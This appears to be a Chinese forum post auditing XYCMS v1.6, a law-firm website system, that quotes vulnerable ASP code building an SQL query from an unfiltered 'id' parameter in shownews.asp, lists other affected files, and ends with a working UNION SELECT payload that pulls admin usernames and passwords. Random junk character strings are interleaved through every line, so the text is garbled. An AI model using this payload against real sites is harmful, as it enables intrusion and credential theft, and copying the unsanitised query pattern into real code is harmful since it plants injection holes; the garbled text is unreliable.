前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似: B. N, A/ q+ U3 Q' e- w M
% j6 G- `1 s: A3 H; H
淫荡分割线, ^( e* S) p M1 s2 |) R
--------------------------------------------------------
& I, i& P$ I* B& B+ ]0 R ( E5 q6 M! x% c- z5 W6 U7 B- i
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
3 V4 B5 n9 K8 T) K- S源码地址:http://down.chinaz.com/soft/29233.htm
; \( D' L5 \0 _+ Z 7 v* U, \# l, Y c5 e
漏洞文件:shownews.asp
* L5 R2 W# R u& ]1 H4 R |% N漏洞代码:7-13行
! o0 R& W+ t' N4 M
; b# M* W& c" X u+ e6 M# @* x4 I) Z
<%
- u: V& f' ]; q) ~& [3 |1 P2 C8 ^id=request.QueryString("id")
# n* n& B& X4 ?, g& Q C) k
' u' B) W) A9 p/ O" m) Kset snews=server.createobject("adodb.recordset")
. q2 s9 F$ V% s- [$ m$ X% rexec="select * from [news] where id="&id
' x" u+ f5 u9 D" y0 a' b9 Isnews.open exec,conn,1,1
+ @; [8 K* o) E; R%>8 M5 p# f6 c/ u! p
+ M3 e; J$ M9 E' n
- W6 D% W" _5 ]4 r# k什么过滤都没有 直造成注入
4 d1 x7 i4 d1 S3 [3 H* I: n , ]. O3 M I, M8 w& b! r% J
注入点:http://127.0.0.1:99/shownews.asp?id=xx
, Q Z( f# Q2 u% k . Y) X ], k6 x8 f( w6 D8 W
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
' i- \' D% X+ U4 j: x9 g' w0 G & e6 i* k M( s
& P( U5 [6 K; p: Wexp: union select 1,admin,password,4,5,7 from admin_user4 w' J& R' y- R: h7 Z! w
* k; [' t, L5 i: K8 X f0 l* K |